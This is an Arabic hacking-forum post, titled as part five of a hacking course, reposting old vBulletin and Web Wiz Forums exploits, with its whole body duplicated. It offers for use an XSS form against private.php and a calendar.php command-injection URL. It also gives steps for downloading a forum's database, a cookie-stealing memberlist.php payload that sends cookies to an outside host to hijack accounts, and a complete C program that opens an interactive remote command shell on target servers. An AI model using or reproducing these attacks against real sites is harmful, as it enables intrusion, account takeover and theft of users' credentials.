تعليم الهكر من الالف الي الياء الجزء الخامس
متي ألقاك ؟ :: الإدارة :: الهكر
صفحة 1 من اصل 1
تعليم الهكر من الالف الي الياء الجزء الخامس
ثغره جديده في منتديات الvb
________________________
أرجوا عدم استخدام الثغرة على المسلمين وفيما يظر بالإسلام وفيما حرمه الله
لكن هذي كانت على النسخة التجريبية Beta
بالنسبة للثغرة فهي واضحة
وهي تستغل عن طريق الرسائل private.php وتقوم بسرقة الكوكيز ولكن بشرط يكون مفعل كود الهتمل في المنتدى وصاحب الثغرة يذكر انه قد يكون من الضروري تسجيل الدخول لك
طبعا استغلالها عن طريق تحويل الكود لملف html مع تغيير اسم الموقع ومجلد المنتدى
http://[victim]/forum/private.php
PHP:
--------------------------------------------------------------------------------
From: Ferruh Mavituna
Subject: VBulletin Preview Message&nbs
p;- XSS Vuln
---------------------------------------
---------------
VBulletin Private Message&nbs
p;"Preview
Message" XSS Vulnerability
---------------------------------------
---------------
Any kind of XSS att
acks possibility.
-----------------------------------------------------
-
About VBulletin;
-----------------------------------------------------
-
PHP Based Popular Forum&
nbsp;Application
Vendor & Demo;
<a href="http://www.vbulletin.com/" target="_blank"><a href="http://www.vbulletin.com/" target="_blank">http://www.vbulletin.com/</a></a>
---------------------------------------
---------------
Vulnerable;
-----------------------------------------------------
-
vBulletin 3.0.0 Beta 2
<
br />vBulletin 2.x
---------------------------------------
---------------
-----------------------------------------------------
-
Vendor Status;
-----------------------------------------------------
-
I can not contact v
endor for this issue ! No patch available at&nb
sp;the moment;
-----------------------------------------------------
-
Solution;
-----------------------------------------------------
-
HTML Encoding like post&
nbsp;thread preview page;
-----------------------------------------------------
-
Exploit Code;
-----------------------------------------------------
-
<html>
<body>
<form action="http://[victim]/forum/private.php"&nbs
p;method="post"
name="vbform">
<input type="hidden" name="do" value="insertpm" />
<input type="hidden" name="pmid" value="" />
<input type="hidden" name="forward" value="" />
<input type="hidden" name="receipt" value="0" />
<input type="text" class="bginput" name="title" value="" size="40"
tabindex="2" />
<textarea name="message" rows="20" cols="70" wrap="virtual"
tabindex="3"></textarea>
<input type="submit" class="button" name="sbutton" value="Post
Message"
accesskey="s" tabindex="4" />
<input type="submit" class="button" value="Preview
Message" accesskey="p"
name="preview" onclick="this.form.dopreview = true; return
true;this.form.submit()" tabindex="5" >
<input type="checkbox" name="savecopy" value="1" id="cb_savecopy"
checked="checked" />
<input type="checkbox" name="signature" value="1" id="cb_signature" />
<input type="checkbox" name="parseurl" value="1" id="cb_parseurl"
checked="checked" />
<input type="checkbox" name="disablesmilies" value="1"
id="cb_disablesmilies" />
</form>
<script>
//Set Values and Submit
// You
can write your own JS codes
var xss = "\"><script>alert(document.coo
kie)</script>";
document.vbform.title.value=xss;
document.vbform.preview.click();
</script>
</body>
</html>
*You may need login first
Ferruh Mavituna
Web Application Security
Consultant
Freelance Developer & Designer
<a href="http://ferruh.mavituna.com"
target="_blank"><a href="http://ferruh.mavituna.com" target="_blank">http://ferruh.mavituna.com</a></a>
الموضوع منقول
اختراق جميع المنتديات.......الجزء2
________________________________________
--------------------------------------------------------------------------------
ثغره جميله لاختراق منتيات الفورم
____________________________
طبعا تعتمد على تحميل قاعده البيانات من الموقع . . . .
وامتدادها تكون . . .
admin/wwforum.mdb
www.###.com/forum
تصبح . . .
www.###.com/forum/admin/wwforum.mdb
طريقه البحث عن الثغره . . . .
www.google.com
وتبحث عن
Web Wiz forum
ويمكنك كتابه
Web Wiz forum 1
Web Wiz forum 2.1
__________________________________________________
___________
ثغرة في منتديات vBulletin في ملفcalendar.php
_ _ _ _ __ _ _ __ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
تأكد من وجود ملف calendar.php
إذا كان موجود إدخل هذا العنوان
http://www.example.com/vb/calendar....mma=%22;echo%20'';%20echo%20%60<comman d>%20%60;die();echo%22
المتغيرات
1-example.com بإسم الموقع
2-<command> بأي أمر لينكس مثا لأمر الباسوورد pwd
______________________________________________
ثغرة vBulletin
-------------------------------------------------------------------
Within the first few lines of code in memberlist.php, the variable $letterbits is evaluated. Because of the way PHP initializes variables, we can inject HTML or JavaScript into the document. So by directing a user to, for example:
http://vulnerable/forum/memberlist....Elocation%3D%27
http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%
2Ephp%3Fcook%3D%27%2B
escape%28document%2Ecookie%29%3C%2Fscript%3E
(NOTE: The URL should be on a one line)
You can steal the user's password hash and user id. Because of the way vBulletin parses URLs, the above will not function inside the forum, but if we put this in an off-site html file:
<script>
location = "http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3Elocation%3D
%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Freco
rd%2Ephp%3Fcook%3D%27
%2Bescape%28document%2Ecookie%29%3C%2Fscript%3E"
</script>
And then link to it instead, the exploit will work as intended. The user doesn't even have to be aware of what has transpired, the above link will proceed first to the memberlist w/cookie stealing code, and then to http://www.swgmotu.com.
With the recorded user id and password hash, we can access the site:
http://www.vbulletin.com/forum/index.php?bbuserid=[userid]&bbpassword=[password hash]
-----------------------------------------------------------------------------------
منقول من موقع امركي
___________________________________
ثغرة vbulletin2
gosper is credited with disclosing this to securiteam on 9-24-02 along with a
working exploit and he probably discovered it too. I wrote this because his
exploit didn't URL encode all the characters that needed to be URL encoded
in order for some of the inputted commands to work properly. I added a date
argument which is essential for exploiting the security hole. I also used an
fdopen() and fgets() to make sure all the output was recieved and displayed
correctly, at least I hope it works better . Last thing I built in was HTTP
version 1.1 support so that you can use this against virtual hosts. Yeah... and
you can exploit this with a web browser too, its just easier to use this program,
most of the time.
Greetz to JadaCyrus, Terrorist, IreEnigma, badpack3t, biocenosis, ttye0,
End of Days, sk3tch and all the people in #ozane (www.ozane.net). If I
forgot you, well shit.
Compile: gcc vbcal.c -o vbcal
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#define url1 "calendar.php?calbirthdays=1&action=getday&day ="
#define url2 "&comma=%22;echo%20'';%20echo%20%60"
#define url3 "%60;die();echo%22"
void time_out(void)
{
printf("\ntimed out on connect()\n");
exit(0);
}
void usage (char *prog)
{
printf("\n\t %s <-h host> <-d date> [-u url_path] [-p port] [-t timeout] [-v (verbose)]\n\n", prog);
printf("\t The -h and -d arguments are required, the rest are optional.");
printf("\n\t date takes the format Year-Month-Day: 2002-11-14 = Nov. 14 2002.");
printf("\n\t date must also be a date on the vBulletin board that has an event on it.\n");
printf("\n\t **Note: if you get a HTML dump of a vBulletin page, you probably used a date without an event on it.");
printf("\n\n\t Examples: %s -h 192.168.1.2 -d 2001-12-8", prog);
printf("\n\t %s -h 192.168.1.2 -d 2002-11-14 -u /forums/ -p 8080 -t 20 -v\n\n", prog);
exit(0);
}
int main(int argc, char *argv[])
{
int c, x, sockfd, verbose = 0;
int timeout = 10; /* timeout for connection */
int port = 80; /* 80 default for HTTPD */
char *path = "/"; /* url path, default = "/" */
char *host = NULL, *date = NULL;
char sign = '%';
char *prog;
char tmp[2];
char tmp2[4];
char cmd_buf[501];
char encoded_cmd[501];
char data[1024];
char output[20480]; /* 20k recv buf */
struct sockaddr_in addr;
struct hostent *he;
struct sigaction action;
FILE *f;
memset(&tmp, '\0', sizeof(tmp));
memset(&tmp2, '\0', sizeof(tmp2));
memset(&cmd_buf, '\0', sizeof(cmd_buf));
memset(&encoded_cmd, '\0', sizeof(encoded_cmd));
memset(&data, '\0', sizeof(data));
memset(&output, '\0', sizeof(output));
prog = argv[0];
fprintf(stderr, "\t ---[ vb_cal.c\n");
fprintf(stderr, "\t ---[ vBulletin 2.0.3 and before Calendar exploit\n");
fprintf(stderr, "\t ---[ c0ded by st0ic\n");
fprintf(stderr, "\t ---[ www.fsix.net\n");
if (argc < 5 || argc > 12)
usage(prog);
while ( (c = getopt(argc, argv, "h:u:t:v")) != -1 )
{
switch(c)
{
case 'h': /* host */
{
host = optarg;
break;
}
case 'd':
{
date = optarg;
break;
}
case 'u': /* url path */
{
path = optarg;
break;
}
case 'p': /* port */
{
port = atoi(optarg);
break;
}
case 't': /* connect timeout */
{
timeout = atoi(optarg);
break;
}
case 'v':
{
verbose = 1;
break;
}
default:
usage(prog);
}
}
/* make sure we got the required stuff */
if (host == NULL)
usage(prog);
else if (date == NULL)
usage(prog);
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket()");
exit(1);
}
if ( (he = gethostbyname(host)) == NULL)
{
perror("gethostbyname()");
exit(1);
}
bzero(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr = *( (struct in_addr *)he->h_addr);
addr.sin_port = htons(port);
bzero(&action, sizeof(action));
action.sa_handler = (void *)time_out;
action.sa_flags = 0;
sigaction(SIGALRM, &action, 0);
alarm(timeout);
if ( connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1)
{
perror("connect()");
exit(1);
}
alarm(0);
printf("\\q to exit cmd prompt\n");
while(1)
{
printf("cmd> ");
fgets(cmd_buf, sizeof(cmd_buf), stdin);
for (x = 0; x < strlen(cmd_buf); x++)
if (cmd_buf[x] == '\n')
cmd_buf[x] = '\0';
if ( (cmd_buf[0] == '' && cmd_buf[1] == 'q') )
exit(0);
for (x = 0; x < strlen(cmd_buf); x++)
{
tmp[0] = cmd_buf[x];
/* 0 - 9 */
if ( (cmd_buf[x] >= 0 && cmd_buf[x] <= 9) )
strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
/* A - Z */
else if ( (cmd_buf[x] >= 65 && cmd_buf[x] <= 90) )
strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
/* a - z */
else if ( (cmd_buf[x] >= 97 && cmd_buf[x] <= 122) )
strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
/* everything not a letter or number */
else
{
snprintf(tmp2, sizeof(tmp2), "%c%X", sign, cmd_buf[x]);
strncat(encoded_cmd, tmp2, sizeof(encoded_cmd));
}
}
/* use HTTP/1.1 in order to send valid HTTP commands to virtual hosts */
snprintf(data, sizeof(data), "GET %s%s%s%s%s%s HTTP/1.1\nHost: %s\n\n", path, url1,
date, url2, encoded_cmd, url3, host);
/* be verbose about the string we're sending in case we need to debug. */
if (verbose == 1)
printf("\nSending: %s", data);
send(sockfd, data, sizeof(data), 0);
if ( (f = fdopen(sockfd, "r+") ) == NULL)
{
perror("fdopen()");
exit(1);
}
while(1)
{
fgets(output, sizeof(output), f);
if (feof(f) != 0)
break;
else
printf("%s", output);
memset(&output, '\0', sizeof(output));
}
memset(&cmd_buf, '\0', sizeof(cmd_buf));
memset(&encoded_cmd, '\0', sizeof(encoded_cmd));
memset(&data, '\0', sizeof(data));
memset(&output, '\0', sizeof(output));
fclose(f);
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket()");
exit(1);
}
alarm(timeout);
if ( connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1)
{
perror("connect()");
exit(1);
}
alarm(0);
}
return 0;
}
-----------------------------------
________________________
أرجوا عدم استخدام الثغرة على المسلمين وفيما يظر بالإسلام وفيما حرمه الله
لكن هذي كانت على النسخة التجريبية Beta
بالنسبة للثغرة فهي واضحة
وهي تستغل عن طريق الرسائل private.php وتقوم بسرقة الكوكيز ولكن بشرط يكون مفعل كود الهتمل في المنتدى وصاحب الثغرة يذكر انه قد يكون من الضروري تسجيل الدخول لك
طبعا استغلالها عن طريق تحويل الكود لملف html مع تغيير اسم الموقع ومجلد المنتدى
http://[victim]/forum/private.php
PHP:
--------------------------------------------------------------------------------
From: Ferruh Mavituna
Subject: VBulletin Preview Message&nbs
p;- XSS Vuln
---------------------------------------
---------------
VBulletin Private Message&nbs
p;"Preview
Message" XSS Vulnerability
---------------------------------------
---------------
Any kind of XSS att
acks possibility.
-----------------------------------------------------
-
About VBulletin;
-----------------------------------------------------
-
PHP Based Popular Forum&
nbsp;Application
Vendor & Demo;
<a href="http://www.vbulletin.com/" target="_blank"><a href="http://www.vbulletin.com/" target="_blank">http://www.vbulletin.com/</a></a>
---------------------------------------
---------------
Vulnerable;
-----------------------------------------------------
-
vBulletin 3.0.0 Beta 2
<
br />vBulletin 2.x
---------------------------------------
---------------
-----------------------------------------------------
-
Vendor Status;
-----------------------------------------------------
-
I can not contact v
endor for this issue ! No patch available at&nb
sp;the moment;
-----------------------------------------------------
-
Solution;
-----------------------------------------------------
-
HTML Encoding like post&
nbsp;thread preview page;
-----------------------------------------------------
-
Exploit Code;
-----------------------------------------------------
-
<html>
<body>
<form action="http://[victim]/forum/private.php"&nbs
p;method="post"
name="vbform">
<input type="hidden" name="do" value="insertpm" />
<input type="hidden" name="pmid" value="" />
<input type="hidden" name="forward" value="" />
<input type="hidden" name="receipt" value="0" />
<input type="text" class="bginput" name="title" value="" size="40"
tabindex="2" />
<textarea name="message" rows="20" cols="70" wrap="virtual"
tabindex="3"></textarea>
<input type="submit" class="button" name="sbutton" value="Post
Message"
accesskey="s" tabindex="4" />
<input type="submit" class="button" value="Preview
Message" accesskey="p"
name="preview" onclick="this.form.dopreview = true; return
true;this.form.submit()" tabindex="5" >
<input type="checkbox" name="savecopy" value="1" id="cb_savecopy"
checked="checked" />
<input type="checkbox" name="signature" value="1" id="cb_signature" />
<input type="checkbox" name="parseurl" value="1" id="cb_parseurl"
checked="checked" />
<input type="checkbox" name="disablesmilies" value="1"
id="cb_disablesmilies" />
</form>
<script>
//Set Values and Submit
// You
can write your own JS codes
var xss = "\"><script>alert(document.coo
kie)</script>";
document.vbform.title.value=xss;
document.vbform.preview.click();
</script>
</body>
</html>
*You may need login first
Ferruh Mavituna
Web Application Security
Consultant
Freelance Developer & Designer
<a href="http://ferruh.mavituna.com"
target="_blank"><a href="http://ferruh.mavituna.com" target="_blank">http://ferruh.mavituna.com</a></a>
الموضوع منقول
اختراق جميع المنتديات.......الجزء2
________________________________________
--------------------------------------------------------------------------------
ثغره جميله لاختراق منتيات الفورم
____________________________
طبعا تعتمد على تحميل قاعده البيانات من الموقع . . . .
وامتدادها تكون . . .
admin/wwforum.mdb
www.###.com/forum
تصبح . . .
www.###.com/forum/admin/wwforum.mdb
طريقه البحث عن الثغره . . . .
www.google.com
وتبحث عن
Web Wiz forum
ويمكنك كتابه
Web Wiz forum 1
Web Wiz forum 2.1
__________________________________________________
___________
ثغرة في منتديات vBulletin في ملفcalendar.php
_ _ _ _ __ _ _ __ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
تأكد من وجود ملف calendar.php
إذا كان موجود إدخل هذا العنوان
http://www.example.com/vb/calendar....mma=%22;echo%20'';%20echo%20%60<comman d>%20%60;die();echo%22
المتغيرات
1-example.com بإسم الموقع
2-<command> بأي أمر لينكس مثا لأمر الباسوورد pwd
______________________________________________
ثغرة vBulletin
-------------------------------------------------------------------
Within the first few lines of code in memberlist.php, the variable $letterbits is evaluated. Because of the way PHP initializes variables, we can inject HTML or JavaScript into the document. So by directing a user to, for example:
http://vulnerable/forum/memberlist....Elocation%3D%27
http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%
2Ephp%3Fcook%3D%27%2B
escape%28document%2Ecookie%29%3C%2Fscript%3E
(NOTE: The URL should be on a one line)
You can steal the user's password hash and user id. Because of the way vBulletin parses URLs, the above will not function inside the forum, but if we put this in an off-site html file:
<script>
location = "http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3Elocation%3D
%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Freco
rd%2Ephp%3Fcook%3D%27
%2Bescape%28document%2Ecookie%29%3C%2Fscript%3E"
</script>
And then link to it instead, the exploit will work as intended. The user doesn't even have to be aware of what has transpired, the above link will proceed first to the memberlist w/cookie stealing code, and then to http://www.swgmotu.com.
With the recorded user id and password hash, we can access the site:
http://www.vbulletin.com/forum/index.php?bbuserid=[userid]&bbpassword=[password hash]
-----------------------------------------------------------------------------------
منقول من موقع امركي
___________________________________
ثغرة vbulletin2
gosper is credited with disclosing this to securiteam on 9-24-02 along with a
working exploit and he probably discovered it too. I wrote this because his
exploit didn't URL encode all the characters that needed to be URL encoded
in order for some of the inputted commands to work properly. I added a date
argument which is essential for exploiting the security hole. I also used an
fdopen() and fgets() to make sure all the output was recieved and displayed
correctly, at least I hope it works better . Last thing I built in was HTTP
version 1.1 support so that you can use this against virtual hosts. Yeah... and
you can exploit this with a web browser too, its just easier to use this program,
most of the time.
Greetz to JadaCyrus, Terrorist, IreEnigma, badpack3t, biocenosis, ttye0,
End of Days, sk3tch and all the people in #ozane (www.ozane.net). If I
forgot you, well shit.
Compile: gcc vbcal.c -o vbcal
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#define url1 "calendar.php?calbirthdays=1&action=getday&day ="
#define url2 "&comma=%22;echo%20'';%20echo%20%60"
#define url3 "%60;die();echo%22"
void time_out(void)
{
printf("\ntimed out on connect()\n");
exit(0);
}
void usage (char *prog)
{
printf("\n\t %s <-h host> <-d date> [-u url_path] [-p port] [-t timeout] [-v (verbose)]\n\n", prog);
printf("\t The -h and -d arguments are required, the rest are optional.");
printf("\n\t date takes the format Year-Month-Day: 2002-11-14 = Nov. 14 2002.");
printf("\n\t date must also be a date on the vBulletin board that has an event on it.\n");
printf("\n\t **Note: if you get a HTML dump of a vBulletin page, you probably used a date without an event on it.");
printf("\n\n\t Examples: %s -h 192.168.1.2 -d 2001-12-8", prog);
printf("\n\t %s -h 192.168.1.2 -d 2002-11-14 -u /forums/ -p 8080 -t 20 -v\n\n", prog);
exit(0);
}
int main(int argc, char *argv[])
{
int c, x, sockfd, verbose = 0;
int timeout = 10; /* timeout for connection */
int port = 80; /* 80 default for HTTPD */
char *path = "/"; /* url path, default = "/" */
char *host = NULL, *date = NULL;
char sign = '%';
char *prog;
char tmp[2];
char tmp2[4];
char cmd_buf[501];
char encoded_cmd[501];
char data[1024];
char output[20480]; /* 20k recv buf */
struct sockaddr_in addr;
struct hostent *he;
struct sigaction action;
FILE *f;
memset(&tmp, '\0', sizeof(tmp));
memset(&tmp2, '\0', sizeof(tmp2));
memset(&cmd_buf, '\0', sizeof(cmd_buf));
memset(&encoded_cmd, '\0', sizeof(encoded_cmd));
memset(&data, '\0', sizeof(data));
memset(&output, '\0', sizeof(output));
prog = argv[0];
fprintf(stderr, "\t ---[ vb_cal.c\n");
fprintf(stderr, "\t ---[ vBulletin 2.0.3 and before Calendar exploit\n");
fprintf(stderr, "\t ---[ c0ded by st0ic\n");
fprintf(stderr, "\t ---[ www.fsix.net\n");
if (argc < 5 || argc > 12)
usage(prog);
while ( (c = getopt(argc, argv, "h:u:t:v")) != -1 )
{
switch(c)
{
case 'h': /* host */
{
host = optarg;
break;
}
case 'd':
{
date = optarg;
break;
}
case 'u': /* url path */
{
path = optarg;
break;
}
case 'p': /* port */
{
port = atoi(optarg);
break;
}
case 't': /* connect timeout */
{
timeout = atoi(optarg);
break;
}
case 'v':
{
verbose = 1;
break;
}
default:
usage(prog);
}
}
/* make sure we got the required stuff */
if (host == NULL)
usage(prog);
else if (date == NULL)
usage(prog);
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket()");
exit(1);
}
if ( (he = gethostbyname(host)) == NULL)
{
perror("gethostbyname()");
exit(1);
}
bzero(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr = *( (struct in_addr *)he->h_addr);
addr.sin_port = htons(port);
bzero(&action, sizeof(action));
action.sa_handler = (void *)time_out;
action.sa_flags = 0;
sigaction(SIGALRM, &action, 0);
alarm(timeout);
if ( connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1)
{
perror("connect()");
exit(1);
}
alarm(0);
printf("\\q to exit cmd prompt\n");
while(1)
{
printf("cmd> ");
fgets(cmd_buf, sizeof(cmd_buf), stdin);
for (x = 0; x < strlen(cmd_buf); x++)
if (cmd_buf[x] == '\n')
cmd_buf[x] = '\0';
if ( (cmd_buf[0] == '' && cmd_buf[1] == 'q') )
exit(0);
for (x = 0; x < strlen(cmd_buf); x++)
{
tmp[0] = cmd_buf[x];
/* 0 - 9 */
if ( (cmd_buf[x] >= 0 && cmd_buf[x] <= 9) )
strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
/* A - Z */
else if ( (cmd_buf[x] >= 65 && cmd_buf[x] <= 90) )
strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
/* a - z */
else if ( (cmd_buf[x] >= 97 && cmd_buf[x] <= 122) )
strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
/* everything not a letter or number */
else
{
snprintf(tmp2, sizeof(tmp2), "%c%X", sign, cmd_buf[x]);
strncat(encoded_cmd, tmp2, sizeof(encoded_cmd));
}
}
/* use HTTP/1.1 in order to send valid HTTP commands to virtual hosts */
snprintf(data, sizeof(data), "GET %s%s%s%s%s%s HTTP/1.1\nHost: %s\n\n", path, url1,
date, url2, encoded_cmd, url3, host);
/* be verbose about the string we're sending in case we need to debug. */
if (verbose == 1)
printf("\nSending: %s", data);
send(sockfd, data, sizeof(data), 0);
if ( (f = fdopen(sockfd, "r+") ) == NULL)
{
perror("fdopen()");
exit(1);
}
while(1)
{
fgets(output, sizeof(output), f);
if (feof(f) != 0)
break;
else
printf("%s", output);
memset(&output, '\0', sizeof(output));
}
memset(&cmd_buf, '\0', sizeof(cmd_buf));
memset(&encoded_cmd, '\0', sizeof(encoded_cmd));
memset(&data, '\0', sizeof(data));
memset(&output, '\0', sizeof(output));
fclose(f);
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket()");
exit(1);
}
alarm(timeout);
if ( connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1)
{
perror("connect()");
exit(1);
}
alarm(0);
}
return 0;
}
-----------------------------------
الامير الهجين- مشرف مدينة الظلمات
- عدد المساهمات : 50
تاريخ التسجيل : 22/02/2010
العمر : 34
الموقع : يلا كوره
مواضيع مماثلة
» تعليم الهكر من الالف الي الياء الجزء الاول
» تعليم الهكر من الالف الي الياء الجزء الثاني
» تعليم الهكر من الالف الي الياء الجزء الرابع
» تفاصيل الانقلاب البعثي الجديد في العراق وبالارقام ( الجزء الاول) )و الجزء الثاني)2010
» افضل طرق الحمايه من الهكر و الاحتراق
» تعليم الهكر من الالف الي الياء الجزء الثاني
» تعليم الهكر من الالف الي الياء الجزء الرابع
» تفاصيل الانقلاب البعثي الجديد في العراق وبالارقام ( الجزء الاول) )و الجزء الثاني)2010
» افضل طرق الحمايه من الهكر و الاحتراق
متي ألقاك ؟ :: الإدارة :: الهكر
صفحة 1 من اصل 1
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى